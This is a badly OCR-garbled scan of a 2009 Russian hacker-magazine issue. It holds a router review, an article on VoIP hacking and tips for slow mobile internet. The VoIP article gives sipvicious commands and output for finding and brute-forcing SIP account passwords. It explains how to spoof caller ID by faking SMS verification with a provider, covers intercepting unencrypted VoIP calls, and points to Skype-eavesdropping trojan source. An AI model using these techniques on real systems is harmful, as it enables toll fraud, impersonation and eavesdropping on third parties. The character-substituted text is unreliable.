ИНТЕРФЕЙСЫ 4Х І_АІ\І Р 1 ХѴѴАЫ 

БЕСПРОВОДНОЙ ИНТЕРФЕЙС: ІЕЕЕ802.11 В/е/Ы 
Ш ИФРОВАН ИЕ: 64/1 28-ВІТѴѴЕР, ѴѴРА, ѴѴРА2, ТКІР, АЕ5 ( ѴѴРА-Р5К, 
ѴѴРА2-Р5К, МАО АББРЕББ, 802. IX 

ПОДДЕРЖИВАЕМЫЕ ТИПЫ ПОДКЛЮЧЕНИЯ: 5ТАТІС ІРАББКЕББ, 
БУМАМІС ІР АББРЕББ (БНСР СЫЕМТ), РРР ОѴЕР ЕТНЕРЫЕТ (РРРОЕ), 
РРТР, Б2ТР 

ВОЗМОЖНОСТИ УСТРОЙСТВА 

Роутеры с поддержкой РгаЛЫ — это отдельная категория высокоскорост- 
ных устройств, которые гарантируют высокую пропускную способность 
нетолько по проводной, но и по беспроводной сети. Сам роутер способен 
поддерживать соединение на скорости до 300 Мбит/с. Крометого, бес- 
проводное соединение может быть защищено самыми современными 
методами шифрования и аутентификации. Как известно, безопасность 
обратно зависима отудобства использования. Но в этом устройстве 
нашла применениетехнология ѴѴР5. Суть ее заключается втом, что при 
одновременном нажатии кнопок на роутере и адаптере можно подклю- 
чить беспроводные устройства с поддержкой ѴѴР5 без ручного ввода всех 
настроек. Маршрутизатор автоматически настроит защищенное беспро- 
водное подключение. Еще одна технология для обеспечения скоростной 
и беспроблемной работы — это Е20о5. Знакомые буквы ОоЗ расшифро- 
вываются какОиаІКу о^Бегѵісе. Технология направлена на резервирова- 
ние части пропускной способности канала под определенные программы 
или протоколы, особо чувствительные кзадержкам. Компания А51І5 
добавила к этому протоколу свои фирменные фишки и назвала систему 
Е20о5. В дополнение кбеспроводным возможностям девайс наделен 
четырьмя портами ЕЖегпеТ Кдвум из них можно подключить видео- 
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СКОРОСТЬ ПЕРЕДАЧИ ДАННЫХ МЕЖДУ ПОРТАМИ 
ЬАЫ И ѴѴАЫ НА ПРЕДЕЛЕ ВОЗМОЖНОСТЕЙ ПРОТО- 
КОЛА 



ЕСЛИ ХОЧЕТСЯ ВЫСОКОЙ СКОРОСТИ — СТОИТ ОБЗА- 
ВЕСТИСЬ БЕСПРОВОДНЫМ АДАПТЕРОМ С ПОДДЕРЖ- 
КОЙ ОРАРТЫ 



декодеры, работающие по сети. 

В последнее время они обретают 
некоторую популярность, поз- 
воляя наслаждаться цифровым 
телевидением в хорошем качестве 
или фильмами на заказ. В любом 
случае, ты сам волен определить 
порт, к которому будут подключены 
устройства, поддерживающие 
тиШсазі-потоки. Более детально 
мы рассмотрим возможности ро- 
утера непосредственно во время 
тестирования. 

МЕТОДИКА 

ТЕСТИРОВАНИЯ 

Для проверки функционирования 
устройства мы воспользовались 
двумя компьютерами и ноутбуком. 
Компьютеры подключались к 
устройству посредством кабеля, 
а ноутбук использовался для 
проверки скорости беспровод- 
ного доступа. Для тестирования 
мы воспользовалисьадаптером 
АЗ II 5 115В- N1 1 . Пробовали мы 
подключиться и при помощи ѴѴР5, 
просто нажав нужные кнопки на 
роутере и адаптере. Проводился 
тест на эргономичность работы с 
меню. Логичность расположения 
элементовуправления, коли- 
чество и вариантность настроек 
играли в плюс. Ну и конечно, мы 
замеряли пропускную способ- 
ностьдевайса в нескольких 
режимах: 

ДиМЛоМАШАТ) 

2) І_АІЧ1оѴѴі-Рі 
ЗП-АтоѴѴАЫ (ѴРІМ) 

Мы решили замерить скорость 
работы при созданном ѴРЫ -кана- 
ле. Высокие скорости передачи 
данных по локальным сетям порой 



упираются в производительность 
роутера именно при работе с ѴРІЧ. 

МОНТИРУЕМ 

И ИГРАЕМ 

Подключив все устройства, мы 
начали настраивать сеть. По ѴѴі-Рі 
соединиться не составило про- 
блем, правда, при активации ѴѴР5 
соединение не былоустановлено. 
Вероятно, проблема кроется в 
прошивке или в индивидуальной 
проблеме устройства. Тем не 
менее, при ручном подключении, 
сетевой адаптер увидел точку 
доступа и подключился к ней на 
своей максимальной скорости 
1 50 Мбит/с. При подключении 
компьютеров по ЕШегпеІ также 
не возникло никаких проблем 
— встроенный ОНСРавтомати- 
чески передает всем устройст- 
вам необходимые настройки. 

Тут мы переходим к настройкам 
ѴРІЧ-соединения. Оченьудачно 
реализована эта функция, так как 
можно вводить адрес ѵрп-сервера 
непос редственно в виде хоста, а 
неір-адреса; это позволяет рабо- 
тать с ѵрп-сетя ми с динамическим 
переключением пользователей 
на менее нагруженные серверы. 
Безусловно, все настройки можно 
производить как при помощи ѵѵеЬ- 
интерфейса.таки посредством 
специальной утилиты. Фирменная 
утилита АЗИЗ Е^ЗеІир позволяет 
настроить подключение к Іпіегпеі: 
и создать защищенное беспро- 
водное подключение всего за 
несколько минут. Если не хочется 
вдаваться в подробности тонкого 
конфигурирования устройства или 
тратитьденьги на вызовтехничес- 
кого специалиста, то достаточно 
будет выбрать провайдера из 



имеющегося списка и ввести 
имя пользователя и пароль. Все 
остальное А51І5 Е25еІир сделает 
самостоятельно в соответствии 
стребованиями провайдера, а 
также настроит дополнительные 
сервисы, предоставляемые про- 
вайдером. 

ѴѴЕВ- ИНТЕРФЕЙС 

Начнем стого, чтоѵѵеЬ-интерфейс 
может быть представлен как на 
английском, так и на русском язы- 
ке. Русификация меню проведена 
довольно качественно. В основ- 
ном меню иконками представлена 
схема сети — наглядно и удобно. 

В расширенном меню можно 
выбрать пункт, позволяющий про- 
извести необходимые настройки. 
Возможности перераспределения 
трафика и выбора приоритетов 
достаточно велики. В соответству- 
ющем пункте меню можно выбрать 
из нескольких вариантов прило- 
жения, которые будут обладать 
приоритетом, и реализовано это 
все при помощи иконок— нагляд- 
но и понятно. 

В целях повышения безопасности 
предусмотрен встроенный бранд- 
мауэр, который недурно справля- 
ется со своими обязанностями. 
Помимо автоматических режимов 
работы, можно самостоятельно 
назначить правила, используя 
встроенные фильтры. Крометого, 
можно воспользоваться встроен- 
ным режимом защиты от БоЗ-атак. 
Для управления роутером извне 
можно активировать ѵѵеЬ-сервер 
для работы по порту ѴѴАІЧ. 

РЕЗУЛЬТАТЫ ЕСТА 

Работать с роутером довольно 
просто и занимательно. Настроив 



единожды все параметры, их мож- 
но экспортировать и в дальней- 
шем, а при сбое просто подгружать 
ранее сохраненные параметры 
сети. Крометого, постоянно 
обновляются прошивки, которые 
увеличивают функционал и ис- 
правляют мелкие недочеты. Стоит 
отметить неплохие скоростные 
характеристики девайса: скорость 
передачи данных при работе по 
беспроводному каналу соста- 
вила почти 55 Мбит/с — очень 
неплохой результат! Правда, 
надо учитывать, что клиентское 
устройство должно поддерживать 
протокол 802.1 1п. По локальной 
сети данные передаются тоже в 
пределах скоростных ограниче- 
ний стандарта. 

итоги 

Подводя итогтестирования, 
отметим высокую дружествен- 
ность пользовательского интер- 
фейса. Для рядового юзера, 
который не жаждет разбираться 
в настройках маршрутизатора, 
есть простая утилита, где доста- 
точно ввести логин с паролем и 
выбрать провайдера. Осталь- 
ных ждет очень подробное 
меню с множеством настроек 
и работой через браузер. Под- 
держка русского языка облег- 
чает процесс взаимодействия 
пользователя с роутером. Высо- 
кая скорость передачи данных 
по беспроводному каналу и 
удобство настройки ЕгОоЗ поз- 
волит работать на любом уст- 
ройстве без видимых задержек. 
В целом, устройство получилось 
очень удачное: высокопроизво- 
дительное и функциональное. 
Рекомендуем! ц-ц 



ХАКЕР 09 /1 29/ 09 



► 027 






РС 20ЫЕ 



I АЛЕКСЕИ «А66РЕ550Р» 



ТЕЛЕФОННЫЕ 

ШАЛОСТИ 



ХАКЕРСКИЙ ПОДХОД К ІР-ТЕЛЕФОНИИ 

Еще нетакдавно сервис Сііскаіеі, позволяющий 
отправлять 5 М5 с любого номера, казался настоящей 
находкой. Побаловались — и надоело. Пора сделать 
следующий шаги разобраться, как с произвольного 
номера... позвонить и поговорить с человеком. 

А заодно посмотреть, как можно перехватить 
голосовой трафик, подобрать пароль для аккаунта 
у 5ІР-провайдера и простоумело использовать 
замечательную технологию ѴоІР. 



ГДЕ ВЗЯТЬ ДЕШЕВУЮ 
СВЯЗЬ? 

Хороший вопрос. Реализаций технологии, 
которая в целом называется Ѵоісе оѵег ІР 
(передача голоса по ІР], существует очень 
много. Но выбирать решение нужно в 
каждом случае отдельно: исходя из своих 
потребностей и направлений для звонков. 
Вот взять хотя бы всем известный Экуре, 
который предоставляет вполне вменяе- 
мые тарифы на звонки по всему миру, а за 
небольшую абонентскую плату вообще готов 
предложить безлимитные разговоры (сразу 
оговорюсь, что российское направление 
под эти условия не попадает]. Но тут мы 
сталкиваемся с серьезным ограничением: 
создатели Зкуре разработали свой фирмен- 
ный пиринговый протокол, позволяющий 
устанавливать связь тем абонентам, прямое 
подключение между которыми из-за ІЧАТ’а 
и файрволов невозможно, и этот протокол — 
закрытый. А значит, ты сразу становишься 
заложником оригинального клиента, а весь 
набор аппаратных средств будет составлять 
лишь крайне небольшой набор железок. 
Никаких тебе мини-АТС и простора для поле- 
та мысли. 

Чтобы не быть связанным по рукам и ногам, 



многие отдают предпочтение технологии 
5ІР (Эеззіоп ІпШабоп Ргоіосоі], на основе 
которой предлагают свои услуги большин- 
ство ѴоІР-провайдеров. Сразу ощущается 
преимущество открытых стандартов. Море 
программных реализаций телефонов и 
широчайший ассортимент всевозможных 
железок. И раз уж речь зашла про про- 
граммные клиенты, рекомендую тебе прямо 
сейчас закачать и установить Х-Ыіе ( ѵѵѵѵѵѵ. 
соипіеграіЬ.сот ] — одну из лучших реализа- 
ций софтварного телефона. 

Операторов, предоставляющих услуги на 
базе 5ІР, настолько много, что приводить 
обзор или банальное сравнение было бы 
просто глупо. Вместо этого упомяну одну 
интересную компанию, а именно Веіатах. 
Это один из крупнейших провайдеров 
ѴоІР-связи в Европе, который, однако, не 
работает напрямую с частными лицами, 
но зато предоставляет свои мощности и 
технологии для работы многочисленных 
ресселеров. Фишка в том, что у каждого 
из таких ресселеров есть определенная 
целевая аудитория, для которой каждый из 
них подгоняет свои тарифы. Если с одного 
сервиса звонки в, скажем, Лихтенштейн 
платные, то есть все шансы найти опе- 
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ратора, который 
предоставляет их 
бесплатно. Кстати, 
такой действитель- 
но есть — ѵѵѵѵѵѵ. 

[оѵѵгаіеѵоір.сот . 

Остается только 
вопрос: как найти нужно- 
го? Для этого есть специальный сайт, 
на котором автоматически собираются и 
группируются тарифы всех реселлеров. 
Держи его в секрете: ШрУ/ЬаскзІа.зЬ/ 
Ьеіатах . Если поискать, то практически 
для всех европейских стран возможно 
найти оператора, который предлагает 
звонки по этому направлению вообще бес- 
платно. Увы, в Россию бесплатные звонки 
доступны только в направлении Питера и 
Москвы. После регистрации ты получаешь 
адрес гейта, логин и пароль — данные 
для авторизации своего 5ІР-аккаунта, 
которые указываются в полях Оотаіп, 
АіЛІіогііаЛоп ІІзег пате, РаззѵѵогсІ окна 
настроек Х-Ы1:е’а (меню -> 5ІР Ассоипіз 
ЭеШпдз]. Как видишь, настроить его не 
сложнее, чем Экуре. После перевода неко- 
торой минимальной суммы на депозит ты 
сможешь осуществлять звонки на обычные 
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городские и мобиль- 
ные телеофоны. 

Еще один инте- 
ресный момент. 
Каждый из сервисов 
Веіатах предостав- 
ляет замечательную 
услугу — 0 і гесѣ 
СаК, позволяющую 
обоим собеседникам 
обходиться одним 
только телефоном 
безо всякой гарни- 
туры. Смысл в том, 
что сервису указы- 
ваются два номера 
сразу — свой и 
собеседника — а тот 
сам установит между 
вами соединение. 
Это, кстати говоря, 
еще и отличный 
способ иницииро- 
вать звонок по ѴоІР, 
используя мобиль- 
ник. Благо, браузер 
можно запустить на 
чем угодно. 

КАК 

ПРОБРУТИТЬ 
5ІР-АККАУНТ 

Если на твоем 5ІР- 
аккаунте есть денеж- 
ки, то позвонить с 
его помощью может 
кто угодно — если 
у него будет адрес 
сервера, логин и 
пароль. Практика 
показывает, что в 
Сети существует 
огромное количество 
неправильно настро- 
енных РВХ (ргіѵаіе 
Ьгапсб ехсбапде] или, 
по-русски говоря, офис- 
ных АТС, а также просто 5ІР-аккаунтов со 
слабыми паролями. Для демонстрации 
этого поднимем программную реализацию 
АТС на базе проекта Азіегіх РВХ ( 
азіегізк.огд ] и проверим его на стойкость 
с помощью специального набора утилит 
ЭІРѴісіоиз [ зірѵісіоиз.огд ]. написанных 
на Руібоп’е. Для того чтобы долго не 
заморачиваться с установкой Ыпих’а и 
дальнейшей настройкой АТС, мы взяли 
за основу проект ТгіхЬох [ ѵѵѵѵѵѵТгіхЬох. 
о гд ] . в котором большинство сервисов уже 
толково настроены, а тебе остается лишь 
ввести несколько настроек вручную через 
удобный веб-интерфейс. На офсайте есть 
образ для виртуальной машины ѴМѵѵаге, 
который можно запустить бесплатной ути- 
литой ѴМѵѵаге Ріауег [ ѵѵѵѵѵѵ.ѵппѵѵаге.сопп/ 
ргосіисіз/ріаѵег ). После запуска, через веб- 
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ИЩЕМ ЕХТЕІМТІОМ'Ы НА АТС 

интерфейс создадим несколько так назы- 
ваемых ехіепзіопз — внутренних номеров: 
100, 101 и 123. Для первого установим 
простой числовой пароль, поле пароля 
для второго оставим пустым, а для третье- 
го номера укажем какое-нибудь простое 
слово, которое есть в любом словаре для 
брута: например, зесгеЕ Опять же повто- 
рюсь: все эти действия мы провернули, 
чтобы создать площадку для эксперимен- 
тов. Для того чтобы найти уязвимые акки, 
используются утилиты из пакета 51 РѴісіоиз : 
каждая из них работает в консоли и может 
запускать как под виндой, так и туксом. 

Для этого сначала просканируем заданную 
подсеть (скажем, это будет 192.168.1.1/24], 
чтобы найти В РХ: 

. / зѵтпар 192.168.1.1/24 

ЗІР Беѵісе I ТЗзег АдепС I 

192.168.1.103:50601 АзЕегізк РВХ | 

Таким образом, в заданном диапазоне ІР мы 
нашли нашу АТС-ку. Далее необходимо про- 
вести ее анализ и отыскать ехіепЕоп’ы: 

. /злллгаг.ру 192.168.1.103 
I ЕхЕепзіоп | АиЕЬепШсаШоп | 



I 123 I гедаиЕЕ I 

I 100 I гедаиЕЕ I 

I 101 I поаиЕЪ. I 

И хотя результат для нас вряд ли можно 
назвать неожиданным, мы видим, что номер 
101 не требует авторизации. А для 100 и 
123 необходимо ввести пароль. Попробуем 
подобрать его для 100, используя подбор по 




БЕСПЛАТНЫЕ НАПРАВЛЕНИЯ 
В ТАРИФНЫХ ПЛАНАХ 
РЕССЕЛЕРОВВЕТАМАХ 

числовым значениям (а они используются 
более чем часто): 

./зѵсгаск.ру 192.168.1.103 -и 100 
I ЕхЕепзіоп | Раззѵгогсі I 



I 100 I 100 I 

Пароль подобран! Теперь попробуем взломать 
пасс для аккаунта 123, используя словарик: 

./зѵсгаск.ру 192.168.1.103 -и 123 
-сі сііскіопагу . ЕхЕ 
I ЕхЕепзіоп | Раззчлгагсі | 



I 123 I зесгеЕ I 

Оба пасса найдены: осталось подставить 
найденные логин-пароль, а также ІР-адрес 
ВРХ в свой 5ІР-клиент и проверить их в 
действии. :) 

Конечно, вероятность успешного брутфор- 
са на отдельно взятый аккаунт невелика. 
Но среди сотен ехіепЕоп’ов всегда най- 
дется хотя бы один со слабым паролем. 
Более того, подход «обнаружить Ьрх, найти 
ехІюпЕоп, подобрать пароль» является 
одной из самых простых атак на ѴоІР. В 
ближайших номерах мы вернемся к этому 
вопросу более детально. 

КАК ПОДДЕЛАТЬ НОМЕР? 

Возможность звонить по дешевым тарифам 
— это уже само по себе хорошо. Только вот 
вместо твоего номера у абонента отобража- 
ется либо «номер скрыт», либо непонятный 
номер ѴоІР-шлюза, обратные звонки на 
который ни к чему хорошему не приве- 
дут. Намного удобнее, если бы в качестве 
СаИегЮ можно было указать номер своего 
сотового телефона, а еще веселее — любой 



РЕГИСТРИРУЕМ НОВЫЙ НОМЕР 
В5ІРЫЕТ. 



2Ш-эакаэ звонка (Ьеіа) 
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р-ку. Для того чтобы позво- 
лиз и нитьабоненту Окуре, 



необязательно само- 
муустанавливать 
[таг. ру клиент и регистри- 
роваться в системе, 
рп I Компания Сігто раз- 
работала специаль- 
I ный сервис ОрепОку 
I [ ѵѵѵѵѵѵ. дігтоб.сот/рс/ 
I рдепвк ), позволяю- 
щий обходиться без 
него. 



> сіѵсі 

Весьупомянутый 
в статье софт, а также 
пару наших ранних 
статей по теме мы вы- 
ложили на ОѴО-диск 
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• Отличная подборка 
софта по ѴоІР: 

ѵѵѵѵѵѵ.ѵоірза.огд/ 

Резоигсез/іооІз.рЬр . 

• Список провай- 
деров, предостав- 
ляющих прямые 
телефонные номера в 
разных странах: ѵѵѵѵѵѵ. 
ѵоір-іпіо.огдАл/ікі/ 
ѵіеѵѵ+ РІР+5егѵісе+ 
Ргоѵісіегз . 





ТАКАЯ 5М5 ПРИХОДИТ НА НОМЕР 
ТЕЛЕФОНА ПОСЛЕ ВЕРИФИКАЦИИ 



произвольный номер! Еще не так давно фокус с под- 
делкой СаІІегЮ можно было провернуть, используя 
лояльность политики 5ІР-операторов. Правда, для этого 
приходилось серьезно попыхтеть, чтобы среди огромного 
количества 5ІР-провайдеров найти тех, кто не фикси- 
ровал жестко поле СаІІегЮ, позволяя установить в него 
произвольное значение. Повторить фокус сейчас, увы, не 
удалось, поэтому мы решили искать другие варианты. 
Подставить в поле СаІІегЮ номер своего сотового теле- 
фона позволяют большинство операторов, но требуют 
при этом пройти процедуру проверки. Как правило, на 
заявленный тобой номер отправляется 5М5-сообщение 
со специальным кодом верификации, который далее 
необходимо ввести на сайте оператора. Хорошая систе- 
ма — не обойдешь. 

Один из успешнейших российских операторов зірпеі 
[ зірпеі.ги ] также поддерживает возможность подста- 
новки своего номера, как одну из бесплатных премиум- 
услуг. Достаточно выбрать в личном кабинете «Премиум 
услуги АОН 5М5 заказ звонка», где есть кнопка 
«Зарегистрировать сотовый телефон» (становится 
доступной после перечисления на депозит $3] . Но! Для 
регистрации требуется всего лишь отправить со своего 
номера 5М5, содержащее код, полученный прямо на 
сайте. Причем само 5М5 бесплатное и отправляется на 
обычный федеральный номер. Понимаешь, к чему мы 
ведем? Ведь все, думаю, пользовались отправкой 5М5 
с подменой номера отправителя? Некоторые сервисы 
предоставляют эту услугу бесплатно, но добавляют в 
сообщение свою информацию, например, рекламу. Нам 
же нужно, чтобы в сообщение не было ничего, кроме 
кода — в противном случае система нас обломает. 
Идеально подходит для этого сервис от Уакооп.сот. 
Скачиваем с их сайта специальное клиент-приложение 
и с его помощью регистрируемся в системе. 

На указанное при регистрации мыло придет код актива- 
ции, который позволит нам залогиниться. А сразу после 
этого телефон порадует тебя звуком пришедшей 5М5, 
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в котором будет код для получения 3 бесплатных 5М5, 
где в качестве отправителя можно указать что угодно, 
хоть даже одни латинские символы. Создаем новое 
5М5 — его текст и номер мы уже получили на сайте 
зірпеѣ, осталось только указать номер отправителя. В 
качестве номера можно указать любой номер телефо- 
на, например, 123456789. После того, как сообщение 
будет доставлено, в премиум услуге «АОН» появится 
номер, с которого мы отправили сообщение. Осталось 
его выбрать и сделать тестовый звонок — все работает! 
Таких номеров можно зарегистрирвоать несколько, но 
имей в виду, что на каждый из них придет 5М5: «Ваш 
номер зарегистрирован в зірпеі». Единственное: для 
переключения между номерами и регистрации новых 
придется заходить в личный кабинет. Для большего 
удобства можно набросать небольшой скрипт, который 
сам будет запрашивать номер верификации и через АРІ 
Уакооп’а отправлять 5М5 для подтверждения номера, а 
затем выбирать его для использования в личном каби- 
нете. 

По-моему, отличный бонус к и без того хорошему сервису 
с выгодными для России тарифами. Впрочем, зірпеі: — не 
единственный провайдер, через который можно реализо- 
вать аналогичную схему. 

КАК ПРОСЛУШАТЬ 5 КУРЕ И 5ІР? 

Перехват данных ѴоІР отличается от традиционного 
снифинга, и хотя снифинг осуществляется по той же 
самой схеме, для сбора пакетов с голосом нужно знать 
некоторые нюансы. Хитрость заключается в том, что 
прослушивание голосового трафика требует перехва- 
та пакетов установления связи и ассоциированного 
медийного потока. Сигнальные сообщения используют 
другой сетевой протокол (ПОР или ТОР) и порт, отлич- 
ный от самой передачи данных. В то же самое время 
медиа поток обычно передается через ІЮР с исполь- 
зованием РТР ( Реа I Тіте Ргоіосоі]. К счастью, задачи 
по перехвату РТР-пакетов и их декодирования, а также 
анализ сессии может автоматически выполняться про- 
двинутыми сниферами. Наш любимый ѴѴігезбагк ( 
ѵѵігезЬагк.огд ) имеет соответствующий пункт «Оіаіізіісз 
ѴоІР Саііз». Получив список ѴоІР-звонков, можно 
изучить, как происходил обмен данными на графиче- 
ской диаграмме или банально прослушать голосовые 
данные. Возможность перехвата ѴоІР-трафика есть и у 
другой известной утилиты Саіп а псі АЬеІ [ ѵѵѵѵѵѵ. ох і 6 .іі ). 
а также ІІСОпіІІ ( исзпііі.зоигсеіогде.пе ). Последний, 
помимо прочего, умеет снимать с сети трафик видео- 
конференций, сохраняя поток в отдельные АѴІ-файлы. 
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УС5ШР ПЕРЕХВАТАЕТ АУДИО И ВИДЕОПОТОКИ ѴОІР 




ПРОИГРЫВАЕМ ПЕРЕХВАЧЕН- 
НЫЕЗВОНКИ 



Конечно, все это действительно только 
в том случае, если трафик передается в 
незащищенном виде. В качестве противо- 
действия сниферам можно использовать 
ТІ_5 (Тгапзрогі І_ауег Зесигііу] для крип- 
тования 5ІР-сигналов и РТР (Весите Пеаі 
Тіте Ргоіосоі) для защиты голоса, однако 
в абсолютном большинстве случаев голос 
передается в открытом виде. 

В плане защищенности намного более 
выигрышнее смотрится Вкуре, который в 
обязательном порядке криптует все пере- 
даваемые данные. Ни одного решения 
для перехвата и дешифрования трафика в 
публичном доступе не существует. Многие 
специалисты по ИБ заявляют, что их нет 
даже у спецслужб. И все-таки... отловить 
разговоры по Вкуре можно, но только если 
получить доступ к системе звонящего. 
Буквально за неделю до того, как номер 
ушел в печать, швейцарский разработчик 
Рубен Уттереггер опубликовал исходники 
трояна, перехватывающего разговоры по 
Вкуре. Троян принимает команды со спе- 
циального сервера и отправляет на него 
аудио-файлы с записями Вкуре-разговоров 
пользователя. Самая главная изюминка 
малвари заключается в модуле Вкуре-Тар, 
который перехватывает АРІ-вызовы Вкуре’а, 
находит среди прочего РСМ-данные со зву- 
ками, после чего преобразовывает их в МРЗ 
и шлет на сервер-хранилище в зашифро- 
ванном виде. Некоторые особенности троя- 
на, а также сами сорцы с довольно простым 
кодом ты можешь на сайте разработчика: 
ѵѵѵѵѵѵ. тед а рапгег. сот . 

КАК ЗАВЕСТИ БЕСПЛАТНЫЙ 
НОМЕР ЗА ГРАНИЦЕЙ 

Одна из интереснейших услуг Вкуре’а с 
давних времен была опция Вкуреіп, позво- 
ляющая завести номер в США и принимать 
звонки, используя клиент Вкуре. Правда, за 
ее использование взимается абонентская 
плата, что сильно препятствует подклю- 
чению ее ради баловства. :) И вот теперь 
обзавестись собственным номером в других 
странах можно совершенно бесплатно. 
СгооѵуТеІ ( ѵѵѵѵѵѵ. дгооѵѵіеЕ сот ) предостав- 



ляет бесплатный номер в Штатах. Каждый 
звонок на этот номер будет переадресован 
одной из систем, в которой реализова- 
но голосовое общение: Соодіе Та Ік, МВЫ 
Меззепдег, Ѵабоо Меззепдег, Ргее ѴѴогІсІ 
О іа Іи р или бігто. Правда, для регистрации 
тебе придется иметь профиль в социальной 
сети РасеЬоок и обзавестись, как минимум, 
20 друзьями. :) При регистрации позволя- 
ют выбрать номер из 3 предложенных, но 
кнопка «Обновить» позволяет очень быстро 
отыскать наиболее достойный вариант. Я 
тестировал систему с ОТа Ік: все отлично 
работает, а при поступлении звонка даже 
отображается номер абонента. 

Но принимать звонки через ОТа Ік не всегда 
удобно. Было бы еще лучше, если в каче- 
стве точки назначения можно было указать 
свой 5ІР-аккаунт (купленный у того же 
зірпеі;). Такую услугу, и опять же бесплат- 
но, предоставляет ІРКаІІ ( ѵѵѵѵѵѵ. іркаЕ. сот ). 
Поддержка открытых протоколов позволяет 
не только использовать софтварные реше- 
ния, но и аппаратные девайсы. Ничего не 
стоит перенаправлять звонки на аккаунт, 
привязанный кѴоІР-шлюзу. К такому адап- 
теру (от $50] можно подключить самый 
обычный телефон, а в связке с ІРКаІІ’а 
на него принимать звонки со своего бес- 
платного номера в Штатах. Учти, — у сер- 
виса нет мгновенной регистрации и после 
составления заявки придется немного 
подождать. 

Другой подобный сервис ЗеШитЬегз ( ѵѵѵѵѵѵ. 
]еІпитЬег5.сот ) пригодится, если номер 
нужен всего на несколько дней — в тече- 
ние триального периода, когда услугой 
можно пользоваться бесплатно. Для про- 
верки можно взять номерочек в Аргентине, 
Франции, Мексике, Великобритании, США. 

МИНИ-АТС ИЗ ТОЧКИ 
ДОСТУПА! 

Для того чтобы поднять офисную АТС, вовсе 
не обязательно приобретать дорогостоящий 
девайс. Если ты внимательно читал наш 
раздел 5ѴЫ/АСК, то вероятно уже разо- 
брался с тем, как поднять программное 
решение на базе АзТегіх ( ѵѵѵѵѵѵ.азіегізк.огд ). 



ТгіхЬох, упомянутый в этой статье, вообще 
сводит всю настройку к управлению через 
удобный веб-интерфейс. Одна проблема — 
для работы такой АТС нам необходим сер- 
вер с никсами, пускай даже запущенный на 
виртуальной машине. Но... можно обойтись 
и без этого. 

Если у тебя дома есть точка доступа или 
другое управляемое сетевое устройство, 
то поднять сервер Азіегіх можно попро- 
бовать прямо на нем. На моей АР-шке Азиз 
ѴѴІбООдР, о котором я уже не раз писал, 
после обновления Ягтѵѵаге прошивкой от 
Оіед’а ( оІед.ѵѵ1500д.і п~Го ] и установки менед- 
жера пакетов і р кд (читай статью «Беѵеі-ир 
для точки доступа», #106 номер ШГ], инстал- 
ляция сводится к нескольким командам: 

іркд ипіпзкаіі азкегізк 
іркд іпзкаіі азкегізк14 
геЬоок 

Для минимальной функциональности доста- 
точно добавить нескольких пользователей 
и привязать их к ехіепбоп’ам (внутренним 
номерам), воспользовавшись мануалом 
для начинающих: ѵѵѵѵѵѵ. еп.ѵоірЬго. сот/ 
азіегізк/азіегізк-бгзі-зіерз.рбр . После этого 
остается установить на разных машинах 
5ІР-клиенты, прописать в них наш сервер и 
учетки. ц-ц 



ѴОІР С ТЕЛЕФОНА 



Совет напоследок. Приложение для звон- 
ков через ѴоІР — обязательный МизШаѵе 
для всех, у кого есть поддержка ѴѴіЕі или 
30 (в случае ее наличия, разумеется]. 
Одним из универсальных вариантов для 
5ІР является приложение Таікопаиі: ( ѵѵѵѵѵѵ. 
ІаІкопаиЕги ]. которое работает и под 
ЗутЬіап 560, и под ѴѴіпбоѵѵз МоЬіІе, и на 
большом числе самых обычных телефо- 
нов, поддерживающих 32МЕ. В случае со 
Бкуре’ом вариантов немного, но, к сча- 
стью, клиент Егіпд ( 'ѵѵѵѵ.ітіпд.соіт ) работа- 
ет безупречно на большинстве платформ 
для коммуникаторов и смартфонов. 
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Как выжить на слабом коннекте? 

Минус 1900 руб. на мобильном и море потерянного 
времени. Нет, я не пытался выиграть ноутбук, 
отправляя ЗМЗ’ки, и не заказывал рингтоны. Я просто 
посидел в инете через 6РР5/Е06Е. Использовать этот 
сервис без ухищрений — это полное не уважение к 
себе. 



М обильные операторы давно рассказываюто возможно- 
стях ЕООЕ. Обещается, что надстройка на СРРЗ поможет 
достичь скорости до 474 кбит/с. Цифра, понятное дело, 
чисто теоретическая, и достичь ее можно только в пике, 
если вдруг мобильный оператор расщедрится и выделиттебе 8тайм- 
слотов и будет использовать самую продвинутую схему кодирования. 

А на практике? На деле все совсем по-другому: даже если на телефоне 
горитзначок Е, это еще не гарантирует, что инет будет работать в 
принципе. Я не шучу: в некоторые местах (справедливости ради стоит 
сказать, что проехал я немного] потери пакетов составляли до 60-70% 
даже при наличии более-менее уверенного приема. Причем ничего 
кроме попытки воспользоваться ЗІМ’кой другого оператора, не по- 
могало. Впрочем, даже там где инет есть, сталкиваешься с мизер- 
ной скоростью, дичайшими лагами, задержками в резол винге О N5 
и — при всем притом — нереальными расценками на ОРВЗ-трафик. 
Приятно удивило только одно: пока в Москве операторы лишь пред- 
принимают попытки локально ввести 30, в некоторых регионах он 
уже вполне себе функционирует. Что, впрочем, не умаляет полезность 
тех приемов, которые помогут пользователям мобильного инета и 
просто слабого коннекта сделать серфинг более комфортным, а также 
сэкономить кучу денег. 



ТРИК 1: 

ЮЗАЕМ КОМПРЕССОР ТООМЕЬ.МЕТ 

Решение Іюопеі. пеі ( ѵѵѵѵѵѵ. Іюопеі. пеі ) мы рассматривали уже не раз и 
не два. Клиентская часть приложения, написанного на баѵа, пред- 
ставляет собой локальный проксик. Прописав его в настройках 
браузера, мы переадресуем трафик клиентской части Іюопеі. пеі:, 
которая через специальный сервер запрашивает нужные данные 
и получает их в сжатом виде. Распаковав информацию, Іюопеі. 
пеІ возвращает ее обратно браузеру в привычном для него виде. 
Аналогичным образом можно сжимать и другие ТСР/ІР-протоколы: 
РТР, 5МТР и т.д. 

У {оопеі.пеі: есть несколько неоспоримых плюсов. Во-первых, 
использование для разработки языка баѵа позволило написать 
клиента для ѴѴіпсІоѵѵз, Ыпих, Мае 05, а также для запуска на любых 
мобильных платформах. Настройка сжимающего туннеля осущест- 
вляется через удобный ОШ-интерфейс: именно там и настраива- 



ются порты, на которых {оопеі 
принимает подключения, чтобы 
дальше перенаправить их на 
сервер. Настроив программы 
на прием подключений на 7999 
порту, нужно прописать прокси в 
браузере: 1 27.0.0.1 . Аналогичным 
образом можно настроить туннели 
и для других портов: 25 (5МТР), 
110 (РОР), 143 (ІМАР) и т.д. В 
отдельной вкладке клиента 
ведется наглядная статисти- 
ка сжатия. 

Собственно, качество 
сжатия — это второй 
плюс этого решения. В 
среднем, с использо- 
ванием Іоопеі.пеі ты 
потребляешь в 2-2.5 
раза меньше трафи- 
ка, чем при прямом 
коннекте. И все 
это без какой-либо 
оплаты услуг: Іюопеі. 
пеі полностью бес- 
платен. К сожалению, 
свободное исполь- 
зование непре- 
